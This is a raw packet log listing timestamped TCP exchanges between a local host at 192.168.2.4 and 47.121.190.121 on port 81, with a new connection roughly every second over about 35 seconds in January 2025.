Jan 9, 2025 23:10:13.753154039 CET	50169	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:13.757994890 CET	81	50169	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:13.758065939 CET	50169	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:13.758344889 CET	50169	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:13.763113022 CET	81	50169	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:14.715929031 CET	81	50169	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:14.715984106 CET	81	50169	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:14.719532013 CET	50169	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:14.719532013 CET	50169	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:14.724453926 CET	81	50169	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:14.831363916 CET	50170	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:14.836198092 CET	81	50170	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:14.839575052 CET	50170	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:14.839575052 CET	50170	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:14.844422102 CET	81	50170	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:15.779397011 CET	81	50170	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:15.779460907 CET	50170	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:15.779911041 CET	81	50170	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:15.780024052 CET	50170	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:15.893264055 CET	50170	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:15.893754959 CET	50171	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:15.898022890 CET	81	50170	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:15.898608923 CET	81	50171	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:15.898680925 CET	50171	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:15.898821115 CET	50171	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:15.903568029 CET	81	50171	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:16.844506025 CET	81	50171	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:16.844876051 CET	81	50171	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:16.845495939 CET	50171	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:16.845495939 CET	50171	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:16.850323915 CET	81	50171	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:16.957393885 CET	50172	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:16.962479115 CET	81	50172	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:16.965466976 CET	50172	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:16.965466976 CET	50172	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:16.970355988 CET	81	50172	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:17.901392937 CET	81	50172	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:17.901468039 CET	81	50172	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:17.901546955 CET	50172	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:17.901546955 CET	50172	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:17.901603937 CET	50172	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:17.906378984 CET	81	50172	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:18.018183947 CET	50173	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:18.023099899 CET	81	50173	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:18.023173094 CET	50173	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:18.023319960 CET	50173	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:18.028115034 CET	81	50173	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:18.969069958 CET	81	50173	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:18.969207048 CET	81	50173	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:18.969304085 CET	50173	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:18.969407082 CET	50173	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:18.974220991 CET	81	50173	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:19.081473112 CET	50174	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:19.086419106 CET	81	50174	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:19.086500883 CET	50174	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:19.086697102 CET	50174	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:19.091557980 CET	81	50174	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:20.020450115 CET	81	50174	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:20.020526886 CET	50174	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:20.020663023 CET	81	50174	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:20.020711899 CET	50174	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:20.127501011 CET	50174	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:20.129508972 CET	50175	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:20.132343054 CET	81	50174	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:20.134368896 CET	81	50175	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:20.137542963 CET	50175	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:20.137542963 CET	50175	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:20.142345905 CET	81	50175	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:21.095432043 CET	81	50175	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:21.095491886 CET	50175	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:21.095562935 CET	81	50175	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:21.095618010 CET	50175	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:21.095705986 CET	50175	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:21.100477934 CET	81	50175	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:21.205765963 CET	50176	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:21.210614920 CET	81	50176	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:21.210685968 CET	50176	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:21.210859060 CET	50176	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:21.215653896 CET	81	50176	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:22.144732952 CET	81	50176	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:22.144965887 CET	81	50176	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:22.147598028 CET	50176	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:22.147598028 CET	50176	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:22.152415991 CET	81	50176	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:22.253330946 CET	50177	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:22.258127928 CET	81	50177	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:22.261481047 CET	50177	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:22.261481047 CET	50177	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:22.266326904 CET	81	50177	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:23.200086117 CET	81	50177	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:23.200153112 CET	50177	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:23.200217962 CET	81	50177	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:23.200269938 CET	50177	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:23.200381041 CET	50177	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:23.205162048 CET	81	50177	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:23.315181971 CET	50178	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:23.319988966 CET	81	50178	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:23.320045948 CET	50178	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:23.320168972 CET	50178	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:23.324956894 CET	81	50178	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:24.302191973 CET	81	50178	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:24.302417040 CET	81	50178	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:24.302443981 CET	50178	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:24.305639029 CET	50178	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:24.409444094 CET	50179	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:24.409574032 CET	50178	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:24.520483971 CET	81	50179	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:24.520500898 CET	81	50178	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:24.520628929 CET	50179	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:24.521346092 CET	50179	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:24.526118040 CET	81	50179	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:25.460303068 CET	81	50179	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:25.460376024 CET	50179	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:25.460402012 CET	81	50179	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:25.460445881 CET	50179	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:25.460762024 CET	50179	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:25.466240883 CET	81	50179	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:25.565004110 CET	50180	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:25.569823027 CET	81	50180	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:25.569895983 CET	50180	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:25.570061922 CET	50180	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:25.574821949 CET	81	50180	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:26.513830900 CET	81	50180	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:26.513952971 CET	50180	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:26.514199018 CET	81	50180	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:26.514389992 CET	50180	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:26.626791954 CET	50181	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:26.626898050 CET	50180	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:26.631824017 CET	81	50181	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:26.631834984 CET	81	50180	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:26.631956100 CET	50181	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:26.632082939 CET	50181	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:26.636841059 CET	81	50181	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:27.607686996 CET	81	50181	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:27.607745886 CET	50181	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:27.608936071 CET	81	50181	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:27.608984947 CET	50181	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:27.720896959 CET	50181	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:27.721414089 CET	50182	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:27.725750923 CET	81	50181	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:27.726444960 CET	81	50182	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:27.726531982 CET	50182	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:27.726716995 CET	50182	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:27.731508017 CET	81	50182	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:28.689682961 CET	81	50182	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:28.689835072 CET	81	50182	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:28.689991951 CET	50182	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:28.690254927 CET	50182	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:28.695064068 CET	81	50182	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:28.800118923 CET	50183	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:28.805051088 CET	81	50183	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:28.805466890 CET	50183	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:28.805876970 CET	50183	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:28.810729027 CET	81	50183	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:29.749628067 CET	81	50183	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:29.749644041 CET	81	50183	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:29.749808073 CET	50183	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:29.749808073 CET	50183	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:29.749984026 CET	50183	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:29.754779100 CET	81	50183	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:29.863553047 CET	50184	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:29.869832993 CET	81	50184	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:29.869898081 CET	50184	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:29.870040894 CET	50184	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:29.876102924 CET	81	50184	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:30.812041998 CET	81	50184	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:30.812248945 CET	81	50184	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:30.812474966 CET	50184	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:30.812474966 CET	50184	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:30.818414927 CET	81	50184	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:30.924146891 CET	50185	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:30.929006100 CET	81	50185	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:30.931444883 CET	50185	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:30.931727886 CET	50185	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:30.936882973 CET	81	50185	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:31.863020897 CET	81	50185	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:31.863038063 CET	81	50185	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:31.863179922 CET	50185	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:31.863179922 CET	50185	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:31.863261938 CET	50185	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:31.868333101 CET	81	50185	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:31.980706930 CET	50186	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:31.986044884 CET	81	50186	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:31.986130953 CET	50186	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:31.990544081 CET	50186	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:31.995361090 CET	81	50186	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:32.949470997 CET	81	50186	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:32.949491024 CET	81	50186	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:32.953634977 CET	50186	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:32.956914902 CET	50186	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:32.961850882 CET	81	50186	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:33.093389988 CET	50187	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:33.098665953 CET	81	50187	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:33.098742962 CET	50187	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:33.098988056 CET	50187	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:33.103765965 CET	81	50187	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:34.075083017 CET	81	50187	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:34.075108051 CET	81	50187	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:34.075896978 CET	50187	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:34.075896978 CET	50187	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:34.080928087 CET	81	50187	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:34.192003965 CET	50188	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:34.197141886 CET	81	50188	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:34.199819088 CET	50188	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:34.199819088 CET	50188	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:34.204642057 CET	81	50188	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:35.171827078 CET	81	50188	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:35.171859026 CET	81	50188	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:35.171919107 CET	50188	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:35.171919107 CET	50188	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:35.173423052 CET	50188	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:35.178240061 CET	81	50188	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:35.285494089 CET	50189	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:35.290329933 CET	81	50189	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:35.290393114 CET	50189	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:35.290659904 CET	50189	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:35.295435905 CET	81	50189	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:36.226672888 CET	81	50189	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:36.226900101 CET	81	50189	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:36.229509115 CET	50189	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:36.229634047 CET	50189	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:36.234427929 CET	81	50189	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:36.348447084 CET	50190	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:36.353440046 CET	81	50190	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:36.357461929 CET	50190	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:36.361396074 CET	50190	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:36.366170883 CET	81	50190	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:37.283035040 CET	81	50190	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:37.283085108 CET	81	50190	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:37.283224106 CET	50190	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:37.283224106 CET	50190	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:37.283308983 CET	50190	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:37.288302898 CET	81	50190	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:37.392740965 CET	50191	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:37.397675991 CET	81	50191	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:37.397735119 CET	50191	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:37.397876978 CET	50191	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:37.402693987 CET	81	50191	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:38.336920977 CET	81	50191	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:38.336975098 CET	81	50191	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:38.336977959 CET	50191	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:38.338144064 CET	50191	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:38.454684019 CET	50191	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:38.455176115 CET	50192	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:38.459574938 CET	81	50191	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:38.460093975 CET	81	50192	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:38.460182905 CET	50192	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:38.460413933 CET	50192	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:38.465230942 CET	81	50192	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:39.413512945 CET	81	50192	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:39.413599014 CET	81	50192	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:39.413619995 CET	50192	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:39.413717031 CET	50192	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:39.413717031 CET	50192	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:39.418559074 CET	81	50192	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:39.518434048 CET	50193	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:39.523390055 CET	81	50193	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:39.523454905 CET	50193	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:39.523576975 CET	50193	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:39.528326035 CET	81	50193	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:40.483513117 CET	81	50193	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:40.483529091 CET	81	50193	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:40.483638048 CET	50193	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:40.483827114 CET	50193	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:40.488586903 CET	81	50193	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:40.596029997 CET	50194	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:40.601200104 CET	81	50194	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:40.601924896 CET	50194	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:40.602041006 CET	50194	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:40.606810093 CET	81	50194	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:41.529268026 CET	81	50194	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:41.529378891 CET	81	50194	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:41.529468060 CET	50194	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:41.529469013 CET	50194	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:41.529561043 CET	50194	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:41.534336090 CET	81	50194	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:41.643146992 CET	50195	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:41.648139954 CET	81	50195	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:41.648216009 CET	50195	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:41.648406029 CET	50195	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:41.653290033 CET	81	50195	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:42.613908052 CET	81	50195	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:42.613961935 CET	81	50195	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:42.614079952 CET	50195	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:42.614341021 CET	50195	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:42.619154930 CET	81	50195	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:42.721014977 CET	50196	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:42.725917101 CET	81	50196	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:42.729610920 CET	50196	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:42.729610920 CET	50196	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:42.734479904 CET	81	50196	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:43.693401098 CET	81	50196	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:43.693432093 CET	81	50196	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:43.693459034 CET	50196	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:43.693485975 CET	50196	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:43.693697929 CET	50196	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:43.698524952 CET	81	50196	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:43.799735069 CET	50197	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:43.804919004 CET	81	50197	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:43.805000067 CET	50197	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:43.805094957 CET	50197	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:43.809956074 CET	81	50197	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:44.769099951 CET	81	50197	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:44.769153118 CET	81	50197	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:44.769386053 CET	50197	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:44.772171974 CET	50197	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:44.776998043 CET	81	50197	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:44.878144026 CET	50198	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:44.883019924 CET	81	50198	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:44.885741949 CET	50198	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:44.885741949 CET	50198	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:44.890602112 CET	81	50198	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:45.838083982 CET	81	50198	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:45.838150024 CET	50198	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:45.838212013 CET	81	50198	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:45.838255882 CET	50198	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:45.955302000 CET	50198	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:45.955705881 CET	50199	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:45.960338116 CET	81	50198	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:45.960704088 CET	81	50199	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:45.960781097 CET	50199	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:45.960925102 CET	50199	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:45.965878010 CET	81	50199	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:46.904695034 CET	81	50199	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:46.904743910 CET	81	50199	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:46.905002117 CET	50199	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:46.905365944 CET	50199	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:46.910279989 CET	81	50199	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:47.017945051 CET	50200	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:47.023222923 CET	81	50200	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:47.024410963 CET	50200	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:47.024410963 CET	50200	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:47.029438972 CET	81	50200	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:48.170428038 CET	81	50200	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:48.170452118 CET	81	50200	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:48.170464993 CET	81	50200	47.121.190.121	192.168.2.4
Jan 9, 2025 23:10:48.170618057 CET	50200	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:48.170618057 CET	50200	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:48.170730114 CET	50200	81	192.168.2.4	47.121.190.121
Jan 9, 2025 23:10:48.175631046 CET	81	50200	47.121.190.121	192.168.2.4
